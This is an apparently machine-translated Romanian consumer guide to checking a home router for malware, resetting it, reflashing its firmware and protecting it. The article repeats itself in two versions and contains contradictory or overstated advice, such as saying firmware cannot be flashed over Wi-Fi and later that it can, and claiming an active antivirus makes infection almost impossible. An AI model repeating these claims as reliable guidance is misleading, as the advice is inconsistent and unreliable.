În orice caz, dacă observați funcționarea incorectă a routerului, merită să îl verificați pentru viruși, în plus, scăpați de ei este foarte ușor.

Cum intră virusul în router?

Routerul oferă internet tuturor dispozitivelor conectate la acesta. Aceasta înseamnă că toate dispozitivele și routerul însuși se află în aceeași rețea de acasă. Acesta este ceea ce folosește virusul: ajunge la computer de pe un site web sau fișier descărcat și apoi este transmis prin rețea către router, unde începe urât. Procesul depinde de modelul virusului, de exemplu, unele programe malware nu se detectează în mod specific pe computer, ci încep să acționeze numai atunci când intră în router, în timp ce altele reușesc să dăuneze atât sistemului de operare, cât și firmware-ului. router în același timp.

Verificare router

Înainte de a curăța routerul de viruși, trebuie să verificați dacă aceștia sunt pe el. Pentru a afla rezultatul, trebuie să utilizați Internetul direct prin computer. Adică, scoateți cablul WLAN sau modemul din router și introduceți-l în portul computerului, apoi urmați acești pași:

Dacă aveți probleme cu viteza, urmați acești trei pași.

  1. Verificați viteza internetului. Acest lucru trebuie făcut pentru a afla pe viitor dacă viteza este aceeași atunci când se utilizează rețeaua direct și printr-un router. De exemplu, puteți descărca un fișier sau puteți utiliza serviciul online special Speedtest.

    Scanarea vitezei internetului prin intermediul site-ului Speedtest

  2. Pentru a determina mai precis calitatea semnalului, trebuie să cunoașteți rata ping-ului. Ping este timpul necesar pentru ca un semnal să fie trimis de pe dispozitiv, la server și înapoi. Desigur, cu cât este mai mare, cu atât este mai rău pentru tine. Deschideți un prompt de comandă, scrieți comanda ping ip și executați-o. Adresa IP a conexiunii dvs., implicită este de obicei 192.168.0.1, dar poate diferi. Amintiți-vă de rezultatul obținut. O valoare ping normală de până la 40 ms este un indicator excelent, 40–110 ms este o valoare medie normală, mai mult de 110 ms - ar trebui să vă gândiți la reconfigurarea rețelei, la îmbunătățirea semnalului sau la schimbarea furnizorului.

    Executăm comanda ping ip

  3. După lista de pachete trimise, veți vedea statistici. Te interesează linia „Pachete”, aceasta calculează câte pachete au fost trimise, pierdute, completate. Dacă numărul de pachete pierdute depășește 5%, trebuie să aflați care este problema. Dacă un număr mare de pachete nu ajung la server sau nu revin, acest lucru va afecta foarte mult viteza Internetului.

    Vedeți ce procent de pachete sunt pierdute

După ce descrieți toți pașii de mai sus, obțineți informații detaliate despre ping, numărul de pachete pierdute și viteza Internetului, reconectați cablul WLAN sau modemul la router și verificați toți aceiași indicatori atunci când vă conectați prin Wi-Fi. Dacă parametrii sunt aproximativ la același nivel, atunci problema nu se află în router, poate că motivul este de partea operatorului. În caz contrar, dacă apar probleme cu Internetul numai atunci când îl utilizați printr-un router, trebuie să resetați setările și să le curățați de viruși.

Îndepărtarea virusului

Pentru a elimina virusul, trebuie să resetați setările la valorile implicite. Dacă virusul a reușit să deterioreze firmware-ul, va trebui să îl instalați din nou singur.

Resetați parametrii

  1. Găsiți butonul Resetare de pe spatele routerului. Ea este de obicei cea mai mică dintre toate celelalte. Trebuie să-l țineți apăsat timp de 10-15 secunde. Când routerul se oprește și începe să repornească, îl puteți elibera. Repornirea routerului vă va anunța că setările au fost resetate. Vă rugăm să rețineți că și parola setată va dispărea.

    Apăsați butonul Reset

  2. Pentru a re-configura routerul, trebuie să-l conectați la computer prin cablu, apoi deschideți browserul și accesați http://192.168.0.1. Poate că adresa va fi diferită, o puteți afla pe un autocolant situat pe router în sine sau în documentația care a venit cu routerul. Vi se vor cere un nume de utilizator și o parolă, în mod implicit numele de utilizator este admin, iar parola este admin sau 12345. Pentru detalii, consultați instrucțiunile pentru router.
  3. Accesați configurarea rapidă. Specificați opțiunile care vi se potrivesc. Dacă doriți, setați o parolă și schimbați numele rețelei. După ce parcurgeți procedura de configurare, salvați modificările și reporniți routerul.

    Accesați secțiunea „Configurare rapidă” și setați setări convenabile

După parcurgerea tuturor pașilor de mai sus, verificați dacă ați scăpat de eroare. Dacă nu, va trebui să reporniți manual routerul.

Se aprinde intermitent routerul

Firmware-ul routerului este posibil numai dacă dispozitivul este conectat la computer folosind un cablu. Nu puteți actualiza firmware-ul prin Wi-Fi.

  1. Există un autocolant pe spatele routerului. Găsiți modelul de router pe el. De asemenea, conține informații despre versiunea de firmware instalată inițial. Dacă versiunea sa este 7, atunci este mai bine să instalați actualizarea pentru versiunea 7 pentru a evita un conflict de firmware prea noi cu hardware-ul vechi al routerului.

    Aflați versiunea de firmware și modelul de router

  2. Accesați site-ul web al producătorului și utilizați caseta de căutare pentru a găsi versiunea de care aveți nevoie pentru modelul dvs. Descărcați-l pe computer.

    Găsiți și descărcați versiunea de firmware necesară

  3. Fișierul descărcat va fi arhivat. Extrageți conținutul acestuia în orice folder convenabil.

    Indicăm calea către firmware

  4. Începeți procedura de actualizare și așteptați să se finalizeze. Reporniți routerul. Firmware-ul trebuie actualizat și, cel mai probabil, toate problemele și virușii au dispărut.

    Așteptăm sfârșitul instalării

Video: cum să flash un router

Cum să vă protejați routerul de viruși în viitor

Singura modalitate de a vă proteja routerul de viruși este să îi împiedicați să intre în computer. Protecția computerului se realizează prin intermediul unui antivirus. Instalați și în niciun caz nu dezactivați niciun antivirus modern. Este aproape imposibil să prindeți software rău intenționat cu antivirus activat. Nici măcar nu este necesar să folosiți programe de securitate plătite, în zilele noastre există destui omologi gratuit de înaltă calitate.

Ce să faci dacă totul eșuează

Dacă implementarea tuturor instrucțiunilor de mai sus nu a adus rezultatul dorit, există două opțiuni: problema apare din cauza defectării părții fizice a routerului sau a erorilor din partea furnizorului. În primul rând, ar trebui să sunați la compania care vă furnizează internetul și să le spuneți despre problema dvs. și despre metodele care nu au ajutat la rezolvarea acesteia. În al doilea rând, routerul trebuie dus la un serviciu special pentru ca specialiști să-l examineze.

Infecția cu un virus de ruter este rară, dar periculoasă. Există două moduri de a scăpa de virus: prin resetarea setărilor și actualizarea firmware-ului. De asemenea, trebuie să vă asigurați că nu rămâne niciun program malware pe computer.

În timpul distribuirii Internetului prin Wi-Fi printr-un router, pot apărea diverse probleme. De exemplu, frânarea și ping-ul ridicat pot apărea din cauza infecției cu virus a echipamentului de distribuție. Să aruncăm o privire mai atentă la cum să curățați singur routerul.

Simptome

Echipamentul poate fi infectat cu următoarele tipuri de viruși:

  • încetinirea ratei de transfer de date. De exemplu, un virus este capabil să distrugă setările, va exista o viteză scăzută, pierderea semnalului etc.;
  • falsificarea adreselor site-urilor. Se întâmplă așa: o persoană merge la o resursă, iar programul rău intenționat schimbă DNS-ul, iar utilizatorul este redirecționat către un site cu reclame sau unitățile de anunțuri plasate de proprietarii site-ului devin vizibile pentru el. Acest virus este, de asemenea, periculos pentru că este capabil să redirecționeze către o resursă care conține alt conținut rău intenționat.


În orice caz, dacă routerul este instabil, este necesar să îl verificați pentru viruși, care sunt suficient de ușor de îndepărtat.

Cum are loc infectia?

Routerul distribuie internetul tuturor gadgeturilor conectate la acesta. Aceasta înseamnă că toate dispozitivele funcționează pe aceeași rețea locală. Virusul profită de acest lucru: intră în computer printr-un site web sau un fișier încărcat, apoi intră într-un router prin rețea, în care efectuează acțiuni rău intenționate.

Severitatea situației depinde de versiunea programului virus, de exemplu, unii dăunători se comportă pe ascuns și încep să acționeze activ numai după ce se află în router, alții, dimpotrivă, pot deteriora sistemul de operare pe parcurs.

Verificarea echipamentelor de rețea pentru infecție

Înainte de a curăța echipamentul de viruși, trebuie să verificați prezența lor pe router. Pentru a face acest lucru, trebuie să conectați cablul de internet direct la un port de pe computer. Scoateți firul WLAN din router și conectați-l la computer, apoi efectuați următoarele manipulări:

  • Lansați browserul și deschideți mai multe site-uri. Asigurați-vă că conținutul lor este corect și că nu există nicio înlocuire de site-uri, unități de anunțuri. În scopul verificării, este mai bine să alegeți resurse în care prezența reclamei nu poate fi.
  • Rulați o scanare a computerului dvs. cu un program antivirus. Acest lucru este necesar pentru a determina calea infecției - de pe un computer sau de pe un router. Rețineți că pot exista mai mulți viruși, iar aceștia pot fi prezenți atât în ​​sistem, cât și în echipamentele de rețea.


Îndepărtarea virusului

Pentru un videoclip despre infectarea routerului cu viruși, vezi aici:

Pentru a elimina programul rău intenționat, trebuie să resetați setările la cele originale. Dacă programul antivirus a deteriorat deja firmware-ul, va trebui să fie reinstalat.

Resetați parametrii

Pentru a curăța routerul, trebuie să-i resetați setările:

  • În partea din spate a dispozitivului, găsiți butonul Resetare. Ea iese adesea în evidență față de ceilalți. Țineți-l apăsat și țineți-l apăsat până când routerul resetează parametrii și repornește. Amintiți-vă că atunci când reporniți, toate setările se vor pierde, iar routerul va trebui configurat din nou.


  • Pentru a configura routerul, trebuie să îl conectați la computer folosind un cablu, apoi să lansați browserul și să formați adresa 192.168.0.1. Poate fi diferit și este indicat pe router în sine sau în documentele acestuia, în instrucțiuni. La introducerea setărilor, acestea introduc adesea numele de utilizator admin, iar parola este aceeași sau 12345. Dacă nu ați reușit să introduceți, atunci ar trebui să vă uitați la instrucțiunile pentru echipamentul de rețea.


  • Găsiți opțiunile de configurare rapidă. Selectați toate care se aplică. De asemenea, puteți schimba parola și numele rețelei. După finalizarea procesului de configurare, salvați-le și reporniți routerul.


După parcurgerea tuturor pașilor descriși, verificați dacă ați reușit să scăpați de problemă. Dacă nu a funcționat, atunci va trebui să rescrieți echipamentul de rețea.

Cum efectuez o clipire?

Se întâmplă ca un program de virus să schimbe firmware-ul routerului. Puteți neutraliza versiunea infectată prin flashing-o.

Conectați computerul la router prin cablu LAN. Ar trebui să fie inclus cu orice router. Dacă nu, atunci puteți utiliza o conexiune Wi-Fi. Cu toate acestea, metoda prin cablu este de preferat.


După conectarea la router, lansați browserul și introduceți valoarea 192.168.1.1 (sau o altă valoare specificată pe dispozitivul propriu-zis) în câmpul de adresă, apoi va trebui să introduceți parola și să vă autentificați pentru a deschide setările routerului. În mod implicit, numele de utilizator și parola sunt admin. Dacă nu puteți introduce setările, atunci trebuie să aflați detaliile de conectare curente, poate că au fost modificate după ultima instalare.

Descărcați noua versiune de firmware de pe site-ul producătorului și accesați setările routerului și selectați-o pe discul computerului. Procesul de firmware este identic pentru toate routerele.


Protecția echipamentelor de rețea împotriva virușilor

Pentru a vă proteja routerul împotriva infecțiilor, puteți utiliza următoarele instrucțiuni:

  • Actualizați firmware-ul la cea mai recentă versiune. Vizitați site-ul web al producătorului, căutați modelul dvs. și descărcați cel mai recent firmware.
  • Setați o valoare a parolei cu mai multe cifre pentru interfața web. Nu toate routerele pot schimba autentificarea. Cu toate acestea, dacă furnizați o parolă puternică, piratarea interfeței web nu va mai fi ușoară.
  • Setați conectarea offline la setările routerului.
  • Schimbați adresa IP a routerului în acces local. În timpul procesului de hacking, virusul va accesa imediat adrese precum 192.168.0.1 și 192.168.1.1. Pe baza acestui lucru, cel mai bine este să schimbați al treilea și al patrulea octet al adresei IP LAN.
  • Instalați un program antivirus de încredere pe computer. Dacă un virus încearcă mai întâi să se infiltreze în computerul dvs., acesta va fi eliminat imediat, împiedicând-o să vă deterioreze routerul.
  • Nu stocați parole în browser.


După cum puteți vedea, nu este dificil să verificați ruterul pentru viruși și să-l curățați. Dar cel mai bine este să urmați sfaturi simple pentru a preveni infecția. Dar dacă se întâmplă asta, știi ce să faci.

Nou pe site

>

Cel mai popular